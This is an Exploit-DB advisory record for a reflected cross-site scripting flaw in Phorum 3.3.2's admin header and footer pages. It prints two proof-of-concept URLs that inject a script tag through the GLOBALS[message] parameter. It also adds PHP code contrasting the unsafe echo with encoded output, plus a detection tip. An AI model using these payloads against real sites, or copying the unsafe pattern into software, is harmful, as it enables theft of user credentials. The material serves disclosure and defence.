ID EDB-ID:21461 Type exploitdb Reporter markus arndt Modified 2002-05-18T00:00:00
Description
Phorum 3.3.2 Cross-Site Scripting Vulnerabilities. Web application exploit for the PHP platform.
source: http://www.securityfocus.com/bid/4767/info
Phorum is a PHP based web forums package designed for most UNIX variants, Linux, and Microsoft Windows operating systems.
The 'header.php' and 'footer.php' components of Phorum do not sanitize the client-supplied value of the 'GLOBALS' parameter prior to output. As a result, script code embedded in this parameter is executed by the client's browser in the context of the Phorum site.
Attackers may exploit this vulnerability to obtain user credentials.
http://[host]/phorum/admin/footer.php?GLOBALS[message]=<script>alert("css strikes!");</script>
http://[host]/phorum/admin/header.php?GLOBALS[message]=<script>alert("css strikes!");</script>
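The flaw described above is a reflected XSS in which request-supplied data ends up in a variable that the page echoes without HTML-encoding it; the `GLOBALS[message]` query parameter in the proof-of-concept URLs works because old PHP configurations with `register_globals` enabled let request parameters populate script variables. The following is an added illustration, not Phorum's own code, showing the unsafe output pattern beside a hardened one. The function names, the `KNOWN_MESSAGES` table and the sample payload are constructed for this example; it assumes PHP 7 or later.

```php
<?php
// Added illustration, not Phorum's code. Models a header/footer include that
// prints an administrative status message.

// Unsafe pattern (hypothetical): whatever the request put into $message is
// echoed raw, so an HTML/script payload reaches the browser unchanged.
function render_message_unsafe($message) {
    return "<div class=\"notice\">$message</div>";
}

// Hardened pattern: the text shown is chosen from a server-side table by id,
// so request input never becomes markup, and the chosen text is still
// HTML-encoded on output as defence in depth.
const KNOWN_MESSAGES = [
    'saved'  => 'Settings saved.',
    'denied' => 'You do not have permission to perform that action.',
];

function render_message_safe($message_id) {
    $text = KNOWN_MESSAGES[$message_id] ?? '';
    return '<div class="notice">'
        . htmlspecialchars($text, ENT_QUOTES | ENT_HTML5, 'UTF-8')
        . '</div>';
}

// Encoding alone, for cases where untrusted text genuinely has to be displayed:
// angle brackets and quotes become entities, so no tag or attribute is created.
function encode_for_html($untrusted) {
    return htmlspecialchars($untrusted, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Constructed demonstration input, mirroring the advisory's payload.
$payload = '<script>alert("css strikes!");</script>';

echo render_message_unsafe($payload), "\n";   // script tag survives intact
echo render_message_safe($payload), "\n";     // unknown id: empty notice
echo render_message_safe('saved'), "\n";      // the intended server-side text
echo '<div class="notice">' . encode_for_html($payload) . "</div>\n";
```

The two defences are independent: not deriving page content from request-controlled variables removes the injection path (which also means running with `register_globals` off), and encoding at the point of output means that even a variable that is attacker-influenced cannot introduce markup. Detection on the server side is straightforward for this case, since the literal `GLOBALS[` in a query string to `admin/header.php` or `admin/footer.php` has no legitimate use.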
Record metadata: Exploit-DB https://www.exploit-db.com/exploits/21461/ (download: https://www.exploit-db.com/download/21461/); title "Phorum 3.3.2 - Cross-Site Scripting Vulnerabilities"; published 2002-05-18; reporter markus arndt; OSVDB IDs 11144, 11145; no CVE assigned.